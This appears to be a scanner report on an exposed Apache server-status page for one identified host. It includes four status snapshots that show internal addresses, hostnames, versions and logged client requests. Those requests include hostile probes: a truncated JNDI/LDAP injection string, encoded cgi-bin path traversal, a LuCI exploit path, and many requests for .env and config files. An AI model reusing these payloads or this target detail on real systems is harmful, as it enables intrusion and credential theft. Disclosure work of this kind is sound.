Apache
tcp/443 tcp/80
The server-status page (usually /server-status
) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4480279abd1
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Friday, 01-Nov-2024 00:40:31 CET Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 135 Parent Server MPM Generation: 134 Server uptime: 133 days 13 hours 7 minutes 22 seconds Server load: 0.00 0.00 0.00 Total accesses: 349575 - Total Traffic: 35.7 GB - Total Duration: 145696907 CPU Usage: u231.72 s177.13 cu942.12 cs126.72 - .0128% CPU load .0303 requests/sec - 3320 B/second - 107.0 kB/request - 416.783 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01590no0yes124000 11591no0yes025000 215904no (old gen)0yes025000 Sum300 174000 __________W_____________________________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-13415900/1/2785_ 0.001508010202480.00.0018.53 141.98.11.79http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-13415900/0/2577_ 0.0015033010386620.00.0015.63 87.120.126.202http/1.1repo.nimoz.pl:443GET /_profiler/phpinfo HTTP/1.1 0-13415900/0/2883_ 0.001503010067680.00.0020.53 193.174.89.19http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-13415900/1/2870_ 0.002309857900.00.0017.16 93.174.93.12http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-13415900/0/2790_ 0.0023010804160.00.0016.81 193.174.89.19http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-13415900/0/2771_ 0.002422010593810.00.0016.11 193.174.89.19http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-13415900/0/2681_ 0.002422010667730.00.0015.94 193.174.89.19http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-13415900/0/2834_ 0.002422022136710.00.001536.49 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-13415900/0/2806_ 0.002422010399870.00.0037.34 193.174.89.19http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-13415900/0/2688_ 0.002422010132220.00.0016.54 193.174.89.19http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-13415900/0/2918W 0.000010733730.00.0019.98 207.154.197.113http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-13415900/0/3251_ 0.0002999226570.00.0031192.92 64.23.174.164http/1.1repo.nimoz.pl:443GET /.github-ci.yml HTTP/1.1 0-13415900/1/2565_ 0.0802210686900.00.0117.21 207.154.197.113http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 0-13415900/1/2719_ 0.080249995840.00.0118.50 207.154.197.113http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-13415900/1/2777_ 0.0802510381220.00.0141.73 207.154.197.113http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-13415900/0/2762_ 0.000329743800.00.0015.82 207.154.197.113http/1.1 0-13415900/0/2846_ 0.001010296670.00.0017.60 207.154.197.113h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-13415900/0/2736_ 0.0013110510030.00.0018.74 207.154.197.113http/1.1 0-13415900/0/2802_ 0.00109865260.00.0015.37 207.154.197.113http/1.1 0-13415900/0/2623_ 0.001012794440.00.00191.88 207.154.197.113http/1.1 0-13415900/0/2901_ 0.001010778030.00.0016.03 207.154.197.113h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-13415900/0/2730_ 0.001010755430.00.0017.48 207.154.197.113h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-13415900/0/2789_ 0.001010377830.00.0017.63 4.156.21.153h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-13415900/0/2894_ 0.001319993810.00.0016.38 193.174.89.19http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-13415900/1/2806_ 0.0112811746300.00.0120.48 207.154.197.113http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-13415910/0/3048_ 0.002422012305740.00.0021.16 45.156.128.56http/1.1 1-13415910/0/2837_ 0.002422011648240.00.0017.68 194.238.27.87http/1.1vm-repo-prd.nimoz.local:80POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 1-13415910/0/2919_ 0.0024222910961190.00.0019.56 45.156.129.46http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-13415910/0/2840_ 0.002422011585940.00.0017.65 159.203.166.8http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-13415910/0/2931_ 0.0024222811719570.00.0020.63 167.94.145.100http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-13415910/0/2923_ 0.0024222312127820.00.0019.62 167.94.146.49http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-13415910/0/2896_ 0.002422011479240.00.0017.80 167.94.138.163h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-13415910/0/2818_ 0.002422011068820.00.0017.46 205.210.31.59http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-13415910/0/2828_ 0.002422010875550.00.0017.01 5.181.190.29http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x05\xa8\x01 1-13415910/0/2942_ 0.0024223012534670.00.0019.02 64.227.181.139http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-13415910/0/2907_ 0.0024222011212170.00.0018.03 167.94.145.100http/1.1 1-13415910/0/2925_ 0.002422011380390.00.0017.86 167.94.146.49http/1.1 1-13415910/0/3092_ 0.002422011678370.00.0022.07 64.226.101.213http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-13415910/0/2853_ 0.002422010932090.00.0017.67 31.220.1.88http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-13415910/0/2960_ 0.002422011717020.00.0017.53 165.154.206.35h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-13415910/0/2896_ 0.0024222611286430.00.0017.11 64.23.174.164http/1.1repo.nimoz.pl:443GET /.gitlab-ci.yml HTTP/1.1 1-13415910/0/3014_ 0.0024222511262600.00.0017.28 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x05\xa8\x01 1-13415910/0/2741_ 0.0024222111244240.00.0017.82 143.244.140.1http/1.1repo.nimoz.pl:443GET /ab2h HTTP/1.1 1-13415910/1/2860_ 0.0402310863340.00.0118.08 207.154.197.113http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-13415910/0/2923_ 0.000012096420.00.0018.72 167.94.138.163http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-13415910/1/3027_ 0.0402211545470.00.0118.20 207.154.197.113http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 1-13415910/1/3040_ 0.0402610942940.00.0117.71 207.154.197.113http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 1-13415910/0/3048_ 0.0002511452700.00.0016.90 198.235.24.237http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-13415910/1/3070_ 0.0302411916980.00.0219.81 207.154.197.113http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-13415910/0/2876_ 0.0012711501290.00.0017.11 207.154.197.113h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-86159040/2812/3287_ 169.9657010</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44801946be3
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Wednesday, 30-Oct-2024 00:50:25 CET Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 133 Parent Server MPM Generation: 132 Server uptime: 131 days 13 hours 17 minutes 17 seconds Server load: 0.00 0.00 0.00 Total accesses: 349104 - Total Traffic: 35.7 GB - Total Duration: 145652715 CPU Usage: u229.85 s173.96 cu938.25 cs126.37 - .0129% CPU load .0307 requests/sec - 3370 B/second - 107.2 kB/request - 417.219 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 215904no (old gen)0yes025000 427775no0yes025000 527776no25yes124000 Sum3025 174000 ..................................................______________ ___________.........................____________________________ _________________W____ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-131-0/0/2777. 0.0030142410201870.00.0018.49 78.153.140.151http/1.1repo.nimoz.pl:443GET /resources/.env HTTP/1.1 0-131-0/0/2574. 0.0030146110386010.00.0015.60 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-131-0/0/2872. 0.00301429410061470.00.0020.45 62.210.101.199http/1.1repo.nimoz.pl:443GET /solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3 0-131-0/0/2866. 0.0030141219857310.00.0017.12 143.244.191.110http/1.1 0-131-0/0/2779. 0.003014010595240.00.0016.80 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-131-0/0/2766. 0.003014010593180.00.0016.08 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-131-0/0/2660. 0.0030142610665670.00.0015.87 78.153.140.151http/1.1repo.nimoz.pl:443GET /search/.env HTTP/1.1 0-131-0/0/2813. 0.003014022121150.00.001536.33 207.154.220.111http/1.1vm-repo-prd.nimoz.local:80GET /password.php HTTP/1.1 0-131-0/0/2802. 0.003014010399570.00.0037.33 165.154.120.226http/1.1vm-repo-prd.nimoz.local:80GET /core/img/manifest.json HTTP/1.1 0-131-0/0/2680. 0.00301417010131930.00.0016.05 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-131-0/0/2912. 0.0030142810721720.00.0019.93 78.153.140.151http/1.1repo.nimoz.pl:443GET /robots/.env HTTP/1.1 0-131-0/0/3245. 0.0030142499225380.00.0031192.86 35.203.210.114http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-131-0/0/2557. 0.003014010685450.00.0017.16 207.154.220.111http/1.1vm-repo-prd.nimoz.local:80GET /geoip/ HTTP/1.1 0-131-0/0/2710. 0.0030141719994900.00.0018.44 64.227.146.163http/1.1 0-131-0/0/2774. 0.00301416210376060.00.0041.70 3.87.146.244http/1.1 0-131-0/0/2751. 0.003014279742090.00.0015.75 78.153.140.151http/1.1repo.nimoz.pl:443GET /office/.env HTTP/1.1 0-131-0/0/2841. 0.003014010296370.00.0017.59 165.154.120.226http/1.1vm-repo-prd.nimoz.local:80GET /core/l10n/zh_CN.js?v=c03a1674-3 HTTP/1.1 0-131-0/0/2732. 0.003014010509210.00.0018.69 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-131-0/0/2791. 0.0030141119864460.00.0015.32 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-131-0/0/2617. 0.003014012794100.00.00191.86 165.154.120.226http/1.1repo.nimoz.pl:443GET /robots.txt HTTP/1.1 0-131-0/0/2893. 0.003014010772600.00.0015.99 185.242.226.116http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon.ico HTTP/1.1 0-131-0/0/2721. 0.003014010755100.00.0017.46 143.244.191.110http/1.1 0-131-0/0/2780. 0.0030149410376900.00.0017.58 143.244.191.110http/1.1 0-131-0/0/2887. 0.00301409993190.00.0016.35 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-touch.png HTTP/1.1 0-131-0/0/2799. 0.003014011745380.00.0020.43 78.153.140.151http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-131-0/0/3048. 0.003014012305740.00.0021.16 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x05\xa8\x01 1-131-0/0/2836. 0.0030142911648240.00.0017.68 185.224.128.83http/1.1repo.nimoz.pl:443GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-131-0/0/2916. 0.003014010960590.00.0019.52 80.82.77.202http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x02\x01o\x01 1-131-0/0/2840. 0.003014011585940.00.0017.65 185.16.38.232http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-131-0/0/2929. 0.003014011719000.00.0020.60 79.30.19.106http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-131-0/0/2922. 0.003014012127580.00.0019.61 185.191.126.248http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-131-0/0/2895. 0.003014011479240.00.0017.80 157.245.35.75h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-131-0/0/2818. 0.003014011068820.00.0017.46 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-131-0/0/2828. 0.003014010875550.00.0017.01 157.245.35.75h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-131-0/0/2942. 0.0030143012534670.00.0019.02 193.177.182.8http/1.1 1-131-0/0/2907. 0.0030142011212170.00.0018.03 141.94.215.112http/1.1repo.nimoz.pl:443POST / HTTP/1.1 1-131-0/0/2924. 0.003014011380390.00.0017.86 157.245.35.75http/1.1 1-131-0/0/3092. 0.003014011678370.00.0022.07 142.93.1.91http/1.1 1-131-0/0/2853. 0.003014010932090.00.0017.67 179.43.191.98http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-131-0/0/2960. 0.003014011717020.00.0017.53 80.82.77.202http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-131-0/0/2893. 0.003014011285860.00.0017.08 141.94.215.112http/1.1 1-131-0/0/3012. 0.003014011262340.00.0017.26 35.203.210.114http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-131-0/0/2740. 0.003014011244030.00.0017.80 35.203.210.114http/1.1 1-131-0/0/2859. 0.003014010863110.00.0018.06 188.152.63.217http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-131-0/0/2921. 0.003014012096110.00.0018.70 165.232.33.216http/1.1 1-131-0/0/3024. 0.003014011545030.00.0018.17 141.94.215.112http/1.1vm-repo-prd.nimoz.local:80GET /.env HTTP/1.1 1-131-0/0/3039. 0.003014010942680.00.0017.70 125.229.192.206http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-131-0/0/3048. 0.0030142511452700.00.0016.90 154.213.184.23http/1.1 1-131-0/0/3069. 0.003014011916730.00.0019.79 179.43.191.98http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-131-0/0/2875. 0.003014011501010.00.0017.09 142.93.1.91http/1.1vm-repo-prd.nimoz.local:80GET /.vscode/sftp.json HTTP/1.1 2-86159040/2811/3286_ 169.7702710814320.016.5420.30 159.89.17.243http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448d2ba44fa
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Monday, 28-Oct-2024 01:57:18 CET Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 131 Parent Server MPM Generation: 130 Server uptime: 129 days 14 hours 24 minutes 10 seconds Server load: 0.00 0.00 0.00 Total accesses: 326148 - Total Traffic: 35.6 GB - Total Duration: 134898038 CPU Usage: u212.26 s169.74 cu893.04 cs123.48 - .0125% CPU load .0291 requests/sec - 3412 B/second - 114.4 kB/request - 413.61 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 020444no0yes124000 120445no0yes025000 215904no (old gen)0yes025000 Sum300 174000 ___W____________________________________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-130204440/1/2617_ 0.001860309709080.00.0118.02 35.203.210.82http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-130204440/0/2463_ 0.002915010060650.00.0015.22 167.94.145.107http/1.1 0-130204440/1/2710_ 0.082915189667200.00.0119.90 179.43.168.146http/1.1repo.nimoz.pl:443GET /idx_config/ HTTP/1.1 0-130204440/1/2661W 0.07009511800.00.0116.56 143.110.213.72http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-130204440/0/2645_ 0.000010169230.00.0016.26 185.191.126.248http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-130204440/2/2533_ 0.1902210201750.00.0215.53 143.110.213.72http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 0-130204440/1/2471_ 0.1911910241600.00.0115.33 143.110.213.72http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-130204440/2/2696_ 0.1922621235670.00.031535.90 143.110.213.72http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-130204440/0/2660_ 0.00309977040.00.0036.84 143.110.213.72http/1.1 0-130204440/0/2536_ 0.00309721620.00.0015.58 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-130204440/1/2738_ 0.0342510301510.00.0119.37 143.110.213.72http/1.1 0-130204440/0/3104_ 0.0043298858990.00.0031192.34 143.110.213.72http/1.1 0-130204440/0/2415_ 0.00409885170.00.0016.68 143.110.213.72http/1.1 0-130204440/1/2568_ 0.024299497710.00.0117.94 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-130204440/0/2561_ 0.00509977520.00.0041.11 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-130204440/0/2633_ 0.00509355170.00.0015.28 179.43.168.146http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-130204440/1/2675_ 0.135289864470.00.0117.10 143.110.213.72http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-130204440/1/2594_ 0.00208010101610.00.0018.23 45.79.137.13http/1.1 0-130204440/0/2626_ 0.0086709495330.00.0014.84 220.133.72.239http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-130204440/0/2477_ 0.00867012252230.00.00191.36 141.98.11.67http/1.1 0-130204440/2/2753_ 0.11872010383850.00.0015.53 185.191.126.248http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-130204440/0/2598_ 0.001539010365910.00.0016.98 179.43.168.146http/1.1 0-130204440/1/2582_ 0.111539269971690.00.0116.95 13.64.193.117http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-130204440/1/2720_ 0.101860329612920.00.0115.60 34.140.203.88http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-130204440/1/2653_ 0.002914011363300.00.0019.96 49.213.189.209http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-130204450/0/2844_ 0.007036010790440.00.0020.40 159.65.123.235http/1.1vm-repo-prd.nimoz.local:80GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1 1-130204450/0/2619_ 0.007036259999790.00.0016.84 167.94.145.107http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-130204450/0/2701_ 0.00703609658460.00.0018.62 162.142.125.216http/1.1 1-130204450/1/2607_ 0.090329837330.00.0116.49 143.110.213.72http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-130204450/0/2706_ 0.00109866460.00.0019.80 52.76.71.100http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-mask.svg HTTP/1.1 1-130204450/1/2748_ 0.0811810479660.00.0118.72 143.110.213.72http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 1-130204450/1/2735_ 0.081249958870.00.0117.14 143.110.213.72http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 1-130204450/0/2640_ 0.00209817610.00.0016.71 164.92.236.64http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-130204450/1/2613_ 0.082219594130.00.0216.15 143.110.213.72http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-130204450/0/2715_ 0.0052610691220.00.0018.08 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-130204450/0/2685_ 0.00288509974190.00.0017.01 78.153.140.151http/1.1vm-repo-prd.nimoz.local:80GET /info/ HTTP/1.1 1-130204450/0/2716_ 0.00288509980210.00.0016.98 52.76.71.100http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-130204450/1/2859_ 0.052890010104000.00.0017.75 179.43.191.98http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-130204450/0/2601_ 0.002915229412810.00.0016.26 179.43.168.146http/1.1repo.nimoz.pl:443GET /idx_config/ HTTP/1.1 1-130204450/1/2799_ 0.0529152410533750.00.0116.89 179.43.168.146http/1.1repo.nimoz.pl:443GET /.env HTTP/1.1 1-130204450/0/2718_ 0.002915199996380.00.0016.32 179.43.168.146http/1.1repo.nimoz.pl:443GET /login.action HTTP/1.1 1-130204450/1/2743_ 0.042915269391840.00.0116.26 179.43.168.146http/1.1repo.nimoz.pl:443GET /.json HTTP/1.1 1-130204450/0/2548_ 0.00291509814740.00.0017.06 52.76.71.100http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon.ico HTTP/1.1 1-130204450/1/2605_ 0.032915259557630.00.0116.70 179.43.168.146http/1.1repo.nimoz.pl:443GET /telescope/requests HTTP/1.1 1-130204450/0/2721_ 0.0029152210072510.00.0017.85 179.43.168.146http/1.1repo.nimoz.pl:443GET /.DS_Store HTTP/1.1 1-130204450/1/2771_ 0.0229152310233560.00.0117.31 179.43.168.146http/1.1repo.nimoz.pl:443GET /config.json HTTP/1.1 1-130204450/0/2824_ 0.00291609763890.00.0016.55 52.76.71.100http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-130204450/1/2761_ 0.012916179983180.00.0115.93 179.43.168.146http/1.1repo.nimoz.pl:443GET /login.action HTTP/1.1 1-130204450/0/2799_ 0.0029163110366090.00.0018.81 179.43.168.146http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-130204450/1/2693_ 0.01291609598740.00.0016.32 179.43.168.146http/1.1repo.nimoz.pl:443GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e 2-86159040/2533/3008
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4488ad783d2
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Saturday, 26-Oct-2024 01:38:02 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 129 Parent Server MPM Generation: 128 Server uptime: 127 days 13 hours 4 minutes 53 seconds Server load: 0.00 0.00 0.00 Total accesses: 304860 - Total Traffic: 35.4 GB - Total Duration: 126981520 CPU Usage: u202.77 s165.73 cu847.26 cs120.39 - .0121% CPU load .0277 requests/sec - 3452 B/second - 121.9 kB/request - 416.524 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 013786no0yes025000 113787no0yes124000 215904no (old gen)0yes025000 Sum300 174000 ____________________________________W___________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-128137860/2/2446_ 0.07109060150.00.0016.59 138.68.144.227http/1.1 0-128137860/0/2276_ 0.00109448430.00.0013.82 138.68.144.227http/1.1 0-128137860/1/2457_ 0.07108932200.00.0018.19 138.68.144.227http/1.1 0-128137860/0/2443_ 0.00118807110.00.0014.19 138.68.144.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-128137860/2/2463_ 0.07109482400.00.0114.68 138.68.144.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-128137860/0/2343_ 0.00109493570.00.0013.99 78.153.140.224http/1.1 0-128137860/1/2271_ 0.07109507720.00.0013.67 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /admin/.env HTTP/1.1 0-128137860/1/2484_ 0.0912820304460.00.011534.23 138.68.144.227http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-128137860/1/2484_ 0.0236109232320.00.0035.39 78.153.140.224http/1.1 0-128137860/1/2269_ 0.0736108986150.00.0013.78 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /docker/.env HTTP/1.1 0-128137860/1/2550_ 0.07362269620410.00.0117.83 78.153.140.224http/1.1 0-128137860/2/2844_ 0.07362098205260.00.0031190.84 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /custom/.env HTTP/1.1 0-128137860/0/2218_ 0.0036509083300.00.0014.93 78.153.140.224http/1.1 0-128137860/2/2380_ 0.0736508827450.00.0216.45 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /exapi/.env HTTP/1.1 0-128137860/1/2352_ 0.0236509248670.00.0039.45 78.153.140.224http/1.1 0-128137860/2/2485_ 0.0736508720530.00.0014.00 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /example.env HTTP/1.1 0-128137860/1/2466_ 0.0236609168350.00.0015.46 78.153.140.224http/1.1 0-128137860/1/2332_ 0.0736609401940.00.0016.64 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /error/.env HTTP/1.1 0-128137860/2/2439_ 0.160228750670.00.0313.24 138.68.144.227http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-128137860/1/2289_ 0.070011524080.00.00189.79 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /en/.env HTTP/1.1 0-128137860/3/2482_ 0.160219682560.00.0313.94 138.68.144.227http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-128137860/2/2370_ 0.160189614110.00.0115.38 138.68.144.227http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-128137860/2/2406_ 0.160209251410.00.0115.23 138.68.144.227http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-128137860/2/2510_ 0.07108851680.00.0013.99 138.68.144.227http/1.1 0-128137860/1/2464_ 0.001010654640.00.0018.50 138.68.144.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-128137870/1/2620_ 0.0236209977420.00.0018.68 78.153.140.224http/1.1 1-128137870/1/2343_ 0.0236209268390.00.0015.16 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /crm/.env HTTP/1.1 1-128137870/1/2498_ 0.0236308865970.00.0016.91 78.153.140.224http/1.1 1-128137870/1/2435_ 0.0236309045940.00.0014.91 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /data/.env HTTP/1.1 1-128137870/1/2488_ 0.0236309051010.00.0018.08 78.153.140.224http/1.1 1-128137870/1/2511_ 0.0236309673530.00.0016.99 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /div/.env HTTP/1.1 1-128137870/1/2520_ 0.0236309198260.00.0015.45 78.153.140.224http/1.1 1-128137870/1/2463_ 0.0236309049330.00.0015.03 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /doc/.env HTTP/1.1 1-128137870/1/2400_ 0.0236408790670.00.0014.34 78.153.140.224http/1.1 1-128137870/1/2463_ 0.0236409875840.00.0016.32 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /fileserver/.env HTTP/1.1 1-128137870/1/2464_ 0.0236409303340.00.0015.43 78.153.140.224http/1.1 1-128137870/1/2495W 0.02009179180.00.0015.24 138.68.144.227http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 1-128137870/1/2644_ 0.02009328480.00.0016.07 78.153.140.224http/1.1 1-128137870/1/2381_ 0.02008645890.00.0014.53 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /favicons/.env HTTP/1.1 1-128137870/2/2516_ 